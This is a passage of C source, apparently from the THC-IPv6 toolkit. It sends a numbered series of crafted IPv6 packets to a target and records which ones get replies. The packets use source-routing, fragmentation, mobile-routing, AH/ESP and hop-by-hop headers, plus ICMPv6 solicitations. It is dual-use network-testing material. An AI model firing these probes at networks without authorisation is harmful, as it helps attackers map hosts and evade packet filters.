%2d: source-routing (done)\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if ((k = check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla))) { tests[count] = 1; if (k == 2 && use_srcroute_type < 0) use_srcroute_type = count; } } count++; if (test == 0 || test == count) { printf("Test %2d: source-routing (todo)\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; // route via ourself, and routers[1] = NULL; // telling the target that this was NOT already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if ((k = check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 200, bla))) { tests[count] = 1; if (k == 2 && use_srcroute_type < 0) use_srcroute_type = count; } } count++; if (test == 0 || test == count) { printf("Test %2d: unauth mobile source-route\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_mobileroute(pkt, &pkt_len, src6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 200, bla)) // XXX TODO: NOT SURE! tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: mobile+source-routing (done)\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, 0, sizeof(bla)); bla[0] = 2; bla[1] = 1; memcpy(bla + 6, src6, 16); // 22 type, 23 routingptr, 24 reserved, 25-27 loose source routing memcpy(bla + 6 + 16 + 6, src6, 16); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_ROUTE, -1, bla, 44) < 0) return -1; memset(bla, count % 256, sizeof(bla)); thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if ((k = check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 200, bla))) { tests[count] = 1; if (k == 2 && use_srcroute_type < 0) use_srcroute_type = count; } } count++; if (test == 0 || test == count) { printf("Test %2d: fragmentation source-route (done)\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 1220, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 250, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: fragmentation source-route (todo)\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was not performed yet if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 1220, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 250, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: hop-by-hop fragmentation source-route\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_hopbyhop(pkt3, &pkt_len3, (unsigned char *) &buf, 6) < 0) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_ROUTE, buf, hdr->pkt_len - 40 - offset)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: destination fragmentation source-route\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt3, &pkt_len3, (unsigned char *) &buf, 6) < 0) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_ROUTE, buf, hdr->pkt_len - 40 - offset)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 1000, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: fragmentation hop-by-hop source-route\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 1220, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_HDR, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 250, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: fragmentation destination source-route\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 1220, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_HDR, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 250, 0, bla)) tests[count] = 1; } count++; /*** misc icmp solicitations ***/ if (test == 0 || test == count) { printf("Test %2d: node information\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); memcpy(buf, (char*) &count + _TAKE4, 4); memcpy(buf + 4, (char*) &count + _TAKE4, 4); memcpy(buf + 8, dst6, 16); thc_add_icmp6(pkt, &pkt_len, ICMP6_INFOREQUEST, 0, 0x00030000, (unsigned char *) &buf, 24, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_INFOREPLY, NXT_ICMP6, ICMP6_INFOREPLY, 0, 0, NULL)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: inverse neighbor solicitation\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0x01; buf[1] = 0x01; memcpy(buf + 2, srcmac, 6); buf[8] = 0x02; buf[9] = 0x01; memcpy(buf + 10, dstmac, 6); thc_add_icmp6(pkt, &pkt_len, ICMP6_INVNEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_INVNEIGHBORADV, NXT_ICMP6, ICMP6_INVNEIGHBORADV, 0, 0, NULL)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: mobile prefix solicitation\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 0xc9; buf[1] = 16; memcpy(buf + 2, src6, 16); if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 18) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_MOBILE_PREFIXSOL, 0, count << 16, (unsigned char *) &buf, 18, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_MOBILE_PREFIXADV, NXT_ICMP6, ICMP6_MOBILE_PREFIXADV, 0, 0, NULL)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: certificate solicitation\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; i = count << 16; i += 0xffff; memset(buf, 0, sizeof(buf)); buf[0] = 15; buf[1] = 8; buf[2] = 1; buf[3] = 4; buf[4] = 1; buf[5] = '.'; thc_add_icmp6(pkt, &pkt_len, ICMP6_CERTPATHSOL, 0, i, (unsigned char *) &buf, 10, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_CERTPATHADV, NXT_ICMP6, ICMP6_CERTPATHADV, 0, 0, NULL)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping6 with a zero AH extension header\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; /* */ if (test == 0 || test == count) { printf("Test %2d: TCP-SYN(1) with a zero AH extension header\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6) < 0) return -1; thc_add_tcp(pkt, &pkt_len, 1, 1, 1, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; /* */ if (test == 0 || test == count) { printf("Test %2d: extension header with two bytes of ping6\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_DST, -1, (unsigned char *) &buf, 6) < 0) return -1; bla[0] = 128; bla[1] = 0; if (thc_add_data6(pkt, &pkt_len, NXT_ICMP6, (unsigned char *) &bla, 2) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping6 with a zero ESP extension header\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_ESP, -1, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: ping from multicast (local!)\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, mcast6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); thc_pcap_close(p); p = thc_pcap_init(interface, string2); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; thc_pcap_close(p); p = thc_pcap_init(interface, string); } count++; if (test == 0 || test == count) { printf("Test %2d: frag+source-route to link local\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = lsrc6; // route via ourself routers[1] = NULL; if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: frag+source-route to multicast\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = mcast6; routers[1] = NULL; if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: frag+srcroute from link local (local!)\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, lsrc6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; routers[1] = NULL; if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); thc_pcap_close(p); p = thc_pcap_init(interface, string2); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, lsrc6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; thc_pcap_close(p); p = thc_pcap_init(interface, string); } count++; if (test == 0 || test == count) { printf("Test %2d: frag+srcroute from multicast (local!)\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, mcast6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; routers[1] = NULL; if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); thc_pcap_close(p); p = thc_pcap_init(interface, string2); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, mcast6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; thc_pcap_close(p); p = thc_pcap_init(interface, string); } count++; if (test == 0 || test == count) { printf("Test %2d: direct neighbor solicitation\t\t", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); memcpy(buf, dst6, 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if (check_for_reply_n(p, src6, dst6)) tests[count] = 1; pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: direct neighbor solicitation ttl<255\t", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); memcpy(buf, dst6, 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 63, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply_n(p, src6, dst6)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: filled ignore hop-by-hop option\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); i = 0; for (j = 0; j < 10; j++) { buf[i++] = NXT_IGNORE; // ignore, length buf[i++] = j; if (j > 0) { memset(buf + i, 0xaa, j); i += j; } } buf[i++] = 1; // padN, length 2 buf[i++] = 2; buf[i++] = count % 256; buf[i++] = count % 256; buf[i++] = 0; // pad1 if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, i) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: filled padding hop-by-hop option\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); i = 0; for (j = 0; j < 10; j++) { buf[i++] = 1; // ignore, length buf[i++] = j; if (j > 0) { memset(buf + i, 0, j); i += j; } } buf[i++] = 1; // padN, length 2 buf[i++] = 2; buf[i++] = 0; buf[i++] = 0; buf[i++] = 0; // pad1 if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, i) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 140, 140 + i, bla)) tests[count] = 1; } count++; /* Testing hop-by-hop options does not make much sense as a reply usually will mean that the option is known, ignored or unknown. // hop: jumbo 0xc2|4|SIZE|SIZE|SIZE|SIZE // hop: router alert 5|2|0|0 // hop: quickstart 6|6|1|count%256|count%256|count%256|count%256|0 (rfc4782) // hop: calipso 7|16|0xff|0xff|0xff|0xff|2|0xff|crc|crc|0xff|0xff|0xff|0xff|0xff|0xff|0xff|0xff */ /* memset(buf, 0, sizeof(buf)); buf[0] = 7; buf[1] = 12; buf[2] = 0xff; buf[3] = 0xff; buf[4] = 0xff; buf[5] = 0xff; buf[6] = 1; buf[7] = 0xff; buf[8] = 0; buf[9] = 0; memset(buf + 10, 0xff, 8); i = calculate_checksum(buf, 18); buf[8] = i / 256; buf[9] = i % 256; */ if 